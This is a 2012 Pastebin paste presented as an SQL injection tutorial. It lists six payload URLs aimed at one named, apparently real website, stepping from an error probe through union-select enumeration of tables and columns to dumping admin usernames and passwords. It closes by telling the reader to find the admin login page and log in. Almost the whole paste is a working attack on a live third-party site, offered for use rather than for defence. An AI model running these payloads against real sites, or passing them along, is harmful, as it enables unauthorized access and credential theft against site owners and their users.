mike466

SQLi Tutorial [www.secure-down.org]

Aug 11th, 2012
480
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.15 KB | None | 0 0
  1. Example Sqli From www.secure-down.org
  2.  
  3. 1]http://www.leadacidbatteryinfo.org/newsdetail.php?id=10' <-Error Sql
  4.  
  5. 2]http://www.leadacidbatteryinfo.org/newsdetail.php?id=10+order+by+11--
  6. (Find the Number untill no error)
  7.  
  8. 3]http://www.leadacidbatteryinfo.org/newsdetail.php?id=10+union+select+1,2,3,4,5,6,7,8,9,10,11--
  9. (Gather All Column Number)
  10.  
  11. 4]http://www.leadacidbatteryinfo.org/newsdetail.php?id=10+union+select+1,2,3,4,5,6,7,group_concat(table_name),9,10,11+from+information_schema.tables+where+table_schema=database()--
  12. (Follow the Fifth Step, We Take the Table Admin-> tbladmin)
  13.  
  14. 5]http://www.leadacidbatteryinfo.org/newsdetail.php?id=10+union+select+1,2,3,4,5,6,7,group_concat(column_name),9,10,11+from+information_schema.columns+where+table_name=0x74626C61646D696E--
  15. (Follow the Sixth Step, We Search the Provid Column Username / Password)
  16.  
  17. 6]http://www.leadacidbatteryinfo.org/newsdetail.php?id=10+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,username,password),9,10,11+from+tbladmin
  18. (Last Step, We Already Get Username / Password: D)
  19.  
  20. Now You Only Need Search Admin Login Page and login ;)
  21. Good luck..
  22. [ SaCCaFrAZi|-=-|www.secure-down.org ]
Add Comment
Please, Sign In to add comment